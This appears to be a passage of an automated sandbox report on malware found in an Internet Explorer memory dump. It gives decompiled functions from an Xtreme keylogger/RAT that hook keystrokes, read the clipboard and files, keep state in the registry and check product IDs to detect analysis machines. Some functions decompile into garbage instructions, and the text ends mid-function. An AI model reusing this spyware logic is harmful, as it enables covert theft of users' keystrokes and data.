				_push(E00C854B1);
				return E00C81B90( &_v20, 2);
			}

APIs

Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4,?,SOFTWARE\,00000000,00C854AA,?,?), ref: 00C8545A
RegSetValueExW.ADVAPI32(?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4), ref: 00C85481
RegCloseKey.ADVAPI32(?,?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00C8548A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

LastSize, xrefs: 00C85478
SOFTWARE\, xrefs: 00C8540E
DSma9HnKa, xrefs: 00C85416
XtremeKeylogger, xrefs: 00C853F2

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C852E8, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 63
registry

C-Code - Quality: 50%

			E00C852E8(void* __ebx) {
				void* _v8;
				char _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				intOrPtr _t44;
				void* _t48;

				_v28 = 0;
				_v24 = 0;
				_push(_t48);
				_push(0xc853aa);
				_push( *[fs:eax]);
				 *[fs:eax] = _t48 + 0xffffffe8;
				_push(L"SOFTWARE\\");
				E00C81CD8( &_v28, 0xb, 0xc8d9bc);
				_push(_v28);
				_push(0xc853d4);
				E00C81D74();
				if(RegOpenKeyExW(0x80000001, E00C81CF4(_v24), 0, 0x20019,  &_v8) == 0) {
					_v20 = 4;
					_v16 = 4;
					if(RegQueryValueExW(_v8, L"LastSize", 0,  &_v20,  &_v12,  &_v16) == 0) {
					}
					RegCloseKey(_v8);
				}
				_pop(_t44);
				 *[fs:eax] = _t44;
				_push(E00C853B1);
				return E00C81B90( &_v28, 2);
			}

APIs

Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00020019,?,00C853D4,?,SOFTWARE\,00000000,00C853AA,?,XtremeKeylogger), ref: 00C8534C
RegQueryValueExW.ADVAPI32(?,LastSize,00000000,?,?,?,80000001,00000000,00000000,00020019,?,00C853D4,?,SOFTWARE\,00000000,00C853AA), ref: 00C8537A
RegCloseKey.ADVAPI32(?,?,LastSize,00000000,?,?,?,80000001,00000000,00000000,00020019,?,00C853D4,?,SOFTWARE\,00000000), ref: 00C8538A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

DSma9HnKa, xrefs: 00C8530F
SOFTWARE\, xrefs: 00C85307
XtremeKeylogger, xrefs: 00C852EE
LastSize, xrefs: 00C85371

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C83A54, Relevance: 12.1, APIs: 8, Instructions: 68

C-Code - Quality: 70%

			E00C83A54(WCHAR* __eax, intOrPtr* __edx) {
				short _v543;
				intOrPtr _v571;
				char _v575;
				void* _v579;
				struct tagPROCESSENTRY32W* _t9;
				WCHAR* _t16;
				void* _t17;
				WCHAR* _t26;
				void* _t27;
				WCHAR* _t29;
				void* _t30;
				void* _t31;
				void* _t34;
				void* _t35;
				intOrPtr* _t36;
				void* _t37;
				intOrPtr* _t38;

				_t36 = __edx;
				_t29 = __eax;
				_t37 = CreateToolhelp32Snapshot(2, 0);
				_v575 = 0x22c;
				_t9 =  &_v575;
				Process32FirstW(_t37, _t9);
				 *_t36 = 0;
				 *_t38 = 0;
				while(_t9 != 0) {
					_push(E00C82E48(_t29) + _t11);
					_push(CharUpperW(_t29));
					_t16 = CharUpperW(E00C83988( &_v543, __eflags));
					_pop(_t34);
					_pop(_t30);
					_t17 = E00C83960(_t16, _t30, _t34);
					__eflags = _t17 - 1;
					if(_t17 == 1) {
						L3:
						 *_t38 = 1;
						 *_t36 = _v571;
					} else {
						_push(E00C82E48(_t29) + _t22);
						_push(CharUpperW(_t29));
						_t26 = CharUpperW( &_v543);
						_pop(_t35);
						_pop(_t31);
						_t27 = E00C83960(_t26, _t31, _t35);
						__eflags = _t27 - 1;
						if(_t27 != 1) {
							_t9 = Process32NextW(_t37,  &_v579);
							continue;
						} else {
							goto L3;
						}
					}
					break;
				}
				CloseHandle(_t37);
				return  *_t38;
			}

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C83A65
Process32FirstW.KERNEL32(00000000,?), ref: 00C83A7A
CharUpperW.USER32(019A0000), ref: 00C83A94

Part of subcall function 00C83988: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,019A0000,00C83AA3,00000000,00000000), ref: 00C839CA
Part of subcall function 00C83988: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,019A0000,00C83AA3,00000000,00000000), ref: 00C83A0F

CharUpperW.USER32(00000000), ref: 00C83AA4
CharUpperW.USER32(019A0000), ref: 00C83ABF
CharUpperW.USER32(?), ref: 00C83ACA
Process32NextW.KERNEL32(00000000,?), ref: 00C83AEC
CloseHandle.KERNEL32(00000000), ref: 00C83AF6

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C854D4, Relevance: 12.1, APIs: 8, Instructions: 54
keyboard

C-Code - Quality: 89%

			E00C854D4(intOrPtr* __eax, intOrPtr* __ecx, void* __edx) {
				void* _t13;
				void* _t14;
				intOrPtr _t20;

				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__ecx =  *__ecx + __eax;
				_t20 =  *__ecx;
				if (_t20 >= 0) goto L1;
				if (_t20 == 0) goto L2;
				_push(_t13);
				 *__ecx =  *__ecx + __ecx;
				if ( *__ecx != 0) goto L3;
				 *[gs:eax] =  *[gs:eax] + __eax;
				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(_t13 - 0x4d)) =  *((intOrPtr*)(_t13 - 0x4d)) + __edx;
				_push(_t13);
				_t14 = 1;
				if(GetKeyState(0x14) != 1 || GetKeyState(0x10) >= 0) {
					if(GetKeyState(0x14) != 1 || GetKeyState(0x10) < 0) {
						if(GetKeyState(0x14) == 1 || GetKeyState(0x10) >= 0) {
							if(GetKeyState(0x14) != 1 && GetKeyState(0x10) >= 0) {
								_t14 = 1;
							}
						} else {
							_t14 = 0;
						}
					} else {
						_t14 = 0;
					}
				} else {
					_t14 = 1;
				}
				return _t14;
			}

APIs

GetKeyState.USER32(00000014), ref: 00C854F1
GetKeyState.USER32(00000010), ref: 00C854FE
GetKeyState.USER32(00000014), ref: 00C8550E
GetKeyState.USER32(00000010), ref: 00C8551B
GetKeyState.USER32(00000014), ref: 00C8552B
GetKeyState.USER32(00000010), ref: 00C85538
GetKeyState.USER32(00000014), ref: 00C85548
GetKeyState.USER32(00000010), ref: 00C85555

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C86748, Relevance: 10.6, APIs: 7, Instructions: 73
windowthread

C-Code - Quality: 47%

			E00C86748(void* __ebx, void* __edi, void* __esi, int _a4, int _a8, long _a12) {
				intOrPtr _v20;
				char _v24;
				struct HKL__* _v28;
				char _v284;
				intOrPtr _v288;
				char _v292;
				struct HHOOK__* _t21;
				int _t35;
				struct HWND__* _t36;
				long _t40;
				void* _t51;

				_push(_t51);
				_push(0xc8683a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t51 + 0xfffffee0;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_a4 == 0 && (_a8 == 0x104 || _a8 == 0x100)) {
					E00C8291C();
					GetKeyboardState( &_v284);
					_v28 = GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(), 0));
					_v292 = _v24;
					_v288 = _v20;
					_t40 = VirtualAlloc(0, 0x10c, 0x1000, 0x40);
					E00C82914(_t40,  &_v292);
					_t35 =  *0xc8decc; // 0xc1f1
					_t36 =  *0xc8b0b4; // 0x100164
					SendMessageA(_t36, _t35, 0x10c, _t40);
				}
				_pop( *[fs:0x0]);
				_push(E00C86841);
				_t21 =  *0xc8b0c4; // 0x0
				return CallNextHookEx(_t21, _a4, _a8, _a12);
			}

APIs

GetKeyboardState.USER32(?), ref: 00C867A6
GetForegroundWindow.USER32 ref: 00C867AB
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C867B3
GetKeyboardLayout.USER32(00000000), ref: 00C867BB
VirtualAlloc.KERNEL32(00000000,0000010C,00001000,00000040,00000000,00C8683A), ref: 00C867E3
SendMessageA.USER32(00100164,0000C1F1,0000010C,00000000), ref: 00C8680E
CallNextHookEx.USER32(00000000,?,?,?), ref: 00C86834

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C8406C, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44

C-Code - Quality: 100%

			E00C8406C(intOrPtr* __eax) {
				struct HINSTANCE__* _t4;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__* _t8;
				void* _t10;
				struct HRSRC__* _t17;
				void* _t18;
				intOrPtr* _t23;
				unsigned int _t25;

				_t23 = __eax;
				E00C81B78(__eax);
				_t4 =  *0xc8c670; // 0xc80000
				_t17 = FindResourceW(_t4, L"XTREMEBINDER", 0xa);
				_t6 =  *0xc8c670; // 0xc80000
				_t25 = SizeofResource(_t6, _t17);
				_t8 =  *0xc8c670; // 0xc80000
				_t18 = LoadResource(_t8, _t17);
				_t10 = LockResource(_t18);
				_t24 = _t10;
				if(_t10 != 0) {
					E00C81F6C(_t23, _t25 >> 1);
					E00C82914(E00C81CF4( *_t23), _t24);
					return FreeResource(_t18);
				}
				return _t10;
			}

0x00c84070
0x00c84074
0x00c84080
0x00c8408b
0x00c8408e
0x00c84099
0x00c8409c
0x00c840a7
0x00c840aa
0x00c840af
0x00c840b3
0x00c840bb
0x00c840cb
0x00000000
0x00c840d1
0x00c840da

APIs

Part of subcall function 00C81B78: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86

FindResourceW.KERNEL32(00C80000,XTREMEBINDER,0000000A), ref: 00C84086
SizeofResource.KERNEL32(00C80000,00000000,00C80000,XTREMEBINDER,0000000A,?,?,00C8E07C,?,00C84136,00000000,00C8453A,?,00000000,00000001,00000000), ref: 00C84094
LoadResource.KERNEL32(00C80000,00000000,00C80000,00000000,00C80000,XTREMEBINDER,0000000A,?,?,00C8E07C,?,00C84136,00000000,00C8453A,?,00000000), ref: 00C840A2
LockResource.KERNEL32(00000000,00C80000,00000000,00C80000,00000000,00C80000,XTREMEBINDER,0000000A,?,?,00C8E07C,?,00C84136,00000000,00C8453A), ref: 00C840AA
FreeResource.KERNEL32(00000000,00000000,00C80000,00000000,00C80000,00000000,00C80000,XTREMEBINDER,0000000A,?,?,00C8E07C,?,00C84136,00000000,00C8453A), ref: 00C840D1

Strings

XTREMEBINDER, xrefs: 00C8407B

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C88324, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33
registry

C-Code - Quality: 100%

			E00C88324() {
				char _v264;
				int _v268;
				void* _v272;
				int _t15;

				_t15 = 0;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268) == 0) {
					_v268 = 0x101;
					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268);
					if( &_v264 == "55274-640-2673064-23950") {
						_t15 = 1;
					}
				}
				RegCloseKey(_v272);
				return _t15;
			}

0x00c8832b
0x00c88343
0x00c88345
0x00c88365
0x00c88373
0x00c88375
0x00c88375
0x00c88373
0x00c8837b
0x00c88389

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C8833C
RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C88365
RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C8837B

Strings

55274-640-2673064-23950, xrefs: 00C8836E
Software\Microsoft\Windows\CurrentVersion, xrefs: 00C88332
ProductId, xrefs: 00C8835B

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C883DC, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33
registry

C-Code - Quality: 100%

			E00C883DC() {
				char _v264;
				int _v268;
				void* _v272;
				int _t15;

				_t15 = 0;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268) == 0) {
					_v268 = 0x101;
					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268);
					if( &_v264 == "76487-644-3177037-23510") {
						_t15 = 1;
					}
				}
				RegCloseKey(_v272);
				return _t15;
			}

0x00c883e3
0x00c883fb
0x00c883fd
0x00c8841d
0x00c8842b
0x00c8842d
0x00c8842d
0x00c8842b
0x00c88433
0x00c88441

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C883F4
RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C8841D
RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C88433

Strings

ProductId, xrefs: 00C88413
76487-644-3177037-23510, xrefs: 00C88426
Software\Microsoft\Windows\CurrentVersion, xrefs: 00C883EA

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C88494, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33
registry

C-Code - Quality: 100%

			E00C88494() {
				char _v264;
				int _v268;
				void* _v272;
				int _t15;

				_t15 = 0;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268) == 0) {
					_v268 = 0x101;
					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268);
					if( &_v264 == "76487-337-8429955-22614") {
						_t15 = 1;
					}
				}
				RegCloseKey(_v272);
				return _t15;
			}

0x00c8849b
0x00c884b3
0x00c884b5
0x00c884d5
0x00c884e3
0x00c884e5
0x00c884e5
0x00c884e3
0x00c884eb
0x00c884f9

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C884AC
RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C884D5
RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C884EB

Strings

76487-337-8429955-22614, xrefs: 00C884DE
Software\Microsoft\Windows\CurrentVersion, xrefs: 00C884A2
ProductId, xrefs: 00C884CB

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C83094, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32

C-Code - Quality: 100%

			E00C83094() {
				WCHAR* _t9;
				short* _t11;
				void* _t12;

				_t9 = E00C833A8(E00C82FE0(), L"x.html", _t12);
				CloseHandle(CreateFileW(_t9, 0x40000000, 2, 0, 2, 0x80, 0));
				_t11 = VirtualAlloc(0, 0x208, 0x1000, 4);
				FindExecutableW(_t9, 0, _t11);
				DeleteFileW(_t9);
				return _t11;
			}

0x00c830a5
0x00c830c0
0x00c830d8
0x00c830de
0x00c830e4
0x00c830ed

APIs

Part of subcall function 00C82FE0: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C849F0,00000000,00C84B74,?,00C8E07C,00000000,00000000), ref: 00C82FEF
Part of subcall function 00C82FE0: GetTempPathW.KERNEL32(00000104,00000000), ref: 00C82FFC

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00C830BA
CloseHandle.KERNEL32(00000000), ref: 00C830C0
VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302,00000002), ref: 00C830D3
FindExecutableW.SHELL32(00000000,00000000,00000000), ref: 00C830DE
DeleteFileW.KERNEL32(00000000,00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302), ref: 00C830E4

Strings

x.html, xrefs: 00C8309B

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C8389C, Relevance: 9.1, APIs: 6, Instructions: 70
clipboard

C-Code - Quality: 65%

			E00C8389C(struct HWND__* __eax, intOrPtr* __ecx, void** __edx) {
				char _v5;
				void* _v12;
				void* _t20;
				intOrPtr* _t28;
				intOrPtr _t38;
				void** _t42;
				void* _t48;
				void* _t50;
				intOrPtr _t51;

				_t48 = _t50;
				_t51 = _t50 + 0xfffffff8;
				_t28 = __ecx;
				_t42 = __edx;
				_v5 = 1;
				 *__ecx = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				if(OpenClipboard(__eax) == 0) {
					_v5 = 0;
					return _v5;
				} else {
					_push(_t48);
					_push(0xc83949);
					_push( *[fs:eax]);
					 *[fs:eax] = _t51;
					_v12 = GetClipboardData(0xd);
					if(_v12 == 0) {
						_v5 = 0;
						_pop(_t38);
						 *[fs:eax] = _t38;
						_push(0xc83954);
						return CloseClipboard();
					} else {
						_push(_t48);
						_push(0xc8392b);
						_push( *[fs:eax]);
						 *[fs:eax] = _t51;
						_t20 = _v12;
						GlobalFix(_t20);
						 *_t42 = _t20;
						 *_t28 = GlobalSize(_v12) - 2;
						 *((intOrPtr*)(_t28 + 4)) = 0;
						 *[fs:eax] = 0;
						_push(0xc83936);
						return GlobalUnWire(_v12);
					}
				}
			}

APIs

OpenClipboard.USER32 ref: 00C838BD
GetClipboardData.USER32(0000000D), ref: 00C838DA
GlobalFix.KERNEL32(00000000), ref: 00C838FA
GlobalSize.KERNEL32(00000000), ref: 00C83905
GlobalUnWire.KERNEL32(00000000), ref: 00C83925
CloseClipboard.USER32 ref: 00C83943

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C835DC, Relevance: 9.1, APIs: 6, Instructions: 58
file

C-Code - Quality: 100%

			E00C835DC(WCHAR* __eax, void** __edx) {
				long _v16;
				struct _OVERLAPPED* _v20;
				long _v24;
				WCHAR* _t18;
				void* _t19;
				long _t23;
				void** _t24;

				_t24 = __edx;
				_t18 = __eax;
				_v24 = 0;
				_v20 = 0;
				if(E00C835B0(__eax) != 0) {
					_t19 = CreateFileW(_t18, 0x80000000, 1, 0, 3, 0, 0);
					if(_t19 != 0xffffffff) {
						_v24 = GetFileSize(_t19, 0);
						_v20 = 0;
						_t23 = _v24;
						 *_t24 = VirtualAlloc(0, _t23, 0x1000, 4);
						SetFilePointer(_t19, 0, 0, 0);
						ReadFile(_t19,  *_t24, _t23,  &_v16, 0);
					}
					CloseHandle(_t19);
				}
				return _v24;
			}

0x00c835e2
0x00c835e4
0x00c835e6
0x00c835ed
0x00c835fe
0x00c83615
0x00c8361a
0x00c83626
0x00c83629
0x00c83634
0x00c83640
0x00c83649
0x00c8365a
0x00c8365a
0x00c83660
0x00c83660
0x00c83672

APIs

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C83610
GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C8361F
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C8363B
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000), ref: 00C83649
ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 00C8365A
CloseHandle.KERNEL32(00000000), ref: 00C83660

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C855E2, Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 305
keyboard

C-Code - Quality: 43%

			E00C855E2(signed int __eax, void* __ebx, signed int __ecx, signed int __edx, void* __edi, signed int __esi) {
				signed char _t37;
				intOrPtr* _t39;
				void* _t40;
				intOrPtr* _t42;
				int _t69;
				int _t73;
				signed char _t97;
				int _t98;
				signed int _t100;
				void* _t111;
				intOrPtr _t113;
				void* _t130;
				intOrPtr* _t131;
				int _t141;
				int _t143;
				void* _t146;
				void* _t148;
				void* _t149;

				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__ecx =  *__ecx + __ecx;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *0x491f0000 =  *0x491f0000 + __eax;
				asm("sbb ecx, [esi+0x4a]");
				_t37 = __eax & 0x0000003e;
				_push(_t146);
				_push(_t37);
				_push(es);
				asm("aas");
				_t97 = __ebx +  *0x18000000 + 0x00000001 &  *__ecx &  *0;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *((intOrPtr*)(_t97 + 8)) =  *((intOrPtr*)(_t97 + 8)) + __edx;
				 *__edx =  *__edx | __ecx;
				_t100 = __ecx |  *(__ecx + 0x11100f0e);
				es = _t149;
				 *__edx =  *__edx + _t97;
				asm("sbb al, 0x3");
				 *__esi =  *__esi ^ __edx;
				asm("aaa");
				asm("daa");
				 *_t100 =  *_t100 - _t100;
				_t39 = _t37 + 0x25 - 0x2d;
				asm("das");
				 *__edx =  *__edx ^ __esi;
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				_t98 = _t97 - 1;
				_push(__edx);
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				_t111 = __edx + 1;
				_t130 = __edi - 1;
				_push(_t100 -  *_t97);
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				 *((intOrPtr*)(_t130 + 0x56)) =  *((intOrPtr*)(_t130 + 0x56)) + _t111;
				_pop(_t40);
				_t148 = _t146 - 1 + 1;
				_t131 = _t130 + 1;
				_t42 = _t40 - 1 + 1;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t131 =  *_t131 + _t111;
				 *_t42 =  *_t42 + _t42;
				 *0 =  *0 + _t111;
				 *_t42 =  *_t42 + _t42;
				 *((intOrPtr*)(_t98 + _t111)) =  *((intOrPtr*)(_t98 + _t111)) + _t111;
				 *_t42 =  *_t42 + _t42;
				asm("adc al, [eax]");
				 *_t42 =  *_t42 + _t42;
				 *((intOrPtr*)((__esi ^  *__esi) + 1)) =  *((intOrPtr*)((__esi ^  *__esi) + 1)) + _t111;
				_push(ds);
				asm("repne pop ebp");
				asm("enter 0x3a00, 0x58");
				asm("enter 0x4b00, 0x58");
				asm("enter 0x5c00, 0x58");
				asm("enter 0x6d00, 0x58");
				asm("enter 0x7e00, 0x58");
				asm("enter 0x8f00, 0x58");
				asm("enter 0xa000, 0x58");
				asm("enter 0xb100, 0x58");
				asm("enter 0xc200, 0x58");
				asm("enter 0xd300, 0x58");
				asm("enter 0xe400, 0x58");
				asm("enter 0xf500, 0x58");
				asm("enter 0x600, 0x59");
				asm("enter 0x1700, 0x59");
				asm("enter 0x2800, 0x59");
				asm("enter 0x3900, 0x59");
				asm("enter 0x4a00, 0x59");
				asm("enter 0x5b00, 0x59");
				asm("enter 0x6c00, 0x59");
				asm("enter 0x7d00, 0x59");
				asm("enter 0x8e00, 0x59");
				asm("enter 0x9f00, 0x59");
				asm("enter 0xb000, 0x59");
				asm("enter 0xc100, 0x59");
				asm("enter 0xd200, 0x59");
				asm("enter 0xe300, 0x59");
				asm("enter 0xf400, 0x59");
				asm("enter 0x500, 0x5a");
				asm("enter 0x1600, 0x5a");
				asm("enter 0x2700, 0x5a");
				asm("enter 0x3800, 0x5a");
				asm("enter 0x4900, 0x5a");
				asm("enter 0x5a00, 0x5a");
				asm("enter 0x6b00, 0x5a");
				asm("enter 0x7c00, 0x5a");
				asm("enter 0x8d00, 0x5a");
				asm("enter 0x9e00, 0x5a");
				asm("enter 0xaf00, 0x5a");
				asm("enter 0xc000, 0x5a");
				asm("enter 0xd100, 0x5a");
				asm("enter 0xe200, 0x5a");
				asm("enter 0xf300, 0x5a");
				asm("enter 0x400, 0x5b");
				asm("enter 0x1500, 0x5b");
